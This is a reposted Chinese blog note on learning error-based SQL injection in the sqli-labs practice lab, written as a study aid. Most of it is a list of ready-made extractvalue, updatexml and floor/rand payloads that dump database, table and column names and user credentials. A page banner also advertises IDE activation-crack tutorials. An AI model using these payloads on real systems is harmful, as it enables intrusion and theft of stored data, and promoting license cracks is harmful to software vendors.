1. 全栈程序员必看首页

报错注入学习[通俗易懂]

全栈程序员-站长 未分类 阅读 2

报错注入学习[通俗易懂]复习完sqlilabs1-4关熟悉了简单sql注入的payload,不用反复看wp的payload,学到了可以0x5c:/%23:#%20:(空格)0x7e=~-1′)unionselect1,(selectgroup_concat(username,0x5c,password)fromusers),3%23遇到第五关报错注入学习文章1学习文章2学习笔记:报错注入原理:报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

复习完sqlilabs 1-4关 熟悉了简单sql注入的payload,不用反复看wp的payload,学到了可以

0x5c:/   %23:#    %20: (空格)  0x7e=~

-1') union select 1,(select group_concat(username,0x5c,password) from users),3 %23

遇到第五关报错注入

学习文章1 学习文章2

SQL 报错注入详解

学习笔记:

报错注入原理:报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。

xpath语法报错

使用条件:mysql版本>5.1.5

extractvalue函数:

extractvalue(xml_document,Xpath_string);

Xpath_string是要求符合xpath语法的字符串,如果不满足要求,则会报错,并且将查询结果放在报错信息里,因此可以利用。(不满足xpath语法的字符串有~,#,$等等)

id='and(select extractvalue("anything",concat('~',(select语句))))
查数据库名:id='and(select extractvalue(1,concat(0x7e,(select database()))))
爆表名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))
爆字段名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))
爆数据:id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

extractvalue()能查询字符串的最大长度为32,如果我们想要的结果超过32,就要用substring()函数截取或limit分页,一次查看最多32位

注:version()=@@version

updatexml函数:

updatexml(xml_document,xpath_string,new_value)

new_value是string格式,替换查找到的负荷条件的数据 作用:改变文档中符合条件的节点的值

爆数据库名:'and(select updatexml(1,concat(0x7e,(select database())),0x7e))
爆表名:'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))
爆列名:'and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))
爆数据:'and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

concat+rand()+group_by()导致主键重复报错

这种报错方法的本质是因为floor(rand(0)*2)的重复性,导致group by语句出错。group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表的数据;如果key不在临时表中,则在临时表中插入key所在行的数据。

爆数据库名:' union select 1,count(*),concat(floor(rand(0)*2),database())x from `users` group by x %23
爆表名:' union select 1,count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1))x from `users` group by x %23
爆列名:' union select 1,count(*),concat(floor(rand(0)*2),(select column_name from information_schema.columns where table_name="TABLE_NAME" limit 0,1))x from `users` group by x %23
爆数据:' union select 1,count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from TABLE_NAME limit 0,1))x from `users` group by x %23

下面对sqlilabs Less-1进行测试

extractvalue函数:

报错注入学习[通俗易懂]

报错注入学习[通俗易懂]

报错注入学习[通俗易懂]

 这里因为能显示的最长长度为32,所以用substr来截取,这里用不来limit分页

报错注入学习[通俗易懂]

报错注入学习[通俗易懂]

报错注入学习[通俗易懂]

updatexml函数:

报错注入学习[通俗易懂]

报错注入学习[通俗易懂]

报错注入学习[通俗易懂]

报错注入学习[通俗易懂]

floor报错:

报错注入学习[通俗易懂]

报错注入学习[通俗易懂]

报错注入学习[通俗易懂]

报错注入学习[通俗易懂]

报错注入学习[通俗易懂]

' union select 1,2,3 from (select count(*),concat(floor(rand(0)*2),database())x from `users` group by x)a %23

这个是另一种payload

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/187981.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • Spring 下,关于动态数据源的事务问题的探讨 全栈程序员社区-公众号

    Spring 下,关于动态数据源的事务问题的探讨

    点击上方“全栈程序员社区”,星标公众号 重磅干货,第一时间送达 作者:青石路 cnblogs.com/youzhibing/p/12671004.html 前情回顾 看着文章的标题…

    全栈程序员-站长的头像 全栈程序员-站长
    2021年6月24日
    84
  • Lamda表达式 集合的筛选

    Lamda表达式 集合的筛选

    Lamda表达式 集合的筛选   在项目中经常会遇到多个集合进行筛选,这时候如果用循环是一种方式,但是有点麻烦,在这里用Lamda表达式,就比较方便了,下面介绍几种方式:查找ListOne中与ListTwo不同的数据varexp2=ListOne.Where(a=>!ListTwo.Where(t=>a.ID==t.ID).Any()).ToList();查找ListOne中与Li…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月4日
    51
  • system verilog教程(魔方教程图解)

    system verilog教程(魔方教程图解)

    第一章:Verilog简介1.1Verilog教程1.2Verilog简介1.3Verilog环境搭建1.4Verilog设计方法第二章:…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月16日
    636
  • python的input格式_javascript设计模式与开发实践 pdf

    python的input格式_javascript设计模式与开发实践 pdf

    python的input格式_javascript设计模式与开发实践 pdffileinput模块可以对一个或多个文件中的内容进行迭代、遍历等操作。该模块的input()函数有点类似文件readlines()方法,区别在于:前者是一个迭代对象,即每次只生成一行,需要用for循环迭代。后者是一次性读取所有行。在碰到大文件的读取时,前者无疑效率更高效。用fileinput对文件进行循环遍历,格式化输出,查找、替换等操作,非常方便。【典型用法】importfileinputf…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月3日
    55
  • C语言中什么是常量表达式_c语言整型表达式

    C语言中什么是常量表达式_c语言整型表达式

    C语言中什么是常量表达式_c语言整型表达式常量表达式c语言,整型表达式和常量表达式中都没有变量参与吧?完整问题:好评回答:表达式没有变量参与?不是很清楚这个问题的定义,只是知道(ab)这种表达式下a和b都可以是变量Java编译器对于String常量表达式的优化是什么呢?完整问题:Java编译器对于String常量表达式的优化是什么呢?好评回答:首先把问题摆出来,先看这个代码Stringa=”ab”;Stringb=”a”…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月29日
    3
  • <span role="heading" aria-level="2">三十岁以上的男人才会用到的网站,不浮夸这是真的

    三十岁以上的男人才会用到的网站,不浮夸这是真的

    三十岁以上的男人才会用到的网站,不浮夸这是真的三十岁以上的男人其实已经经历过很多多岁月了,无论是工作、社交、还是家庭都应该是得心应手的。但是未必所有三十岁的男人都用到过下面这些网站。PPT素材类优品PPT我们可以免费PPT模板下载网站!企帮

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月3日
    31

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号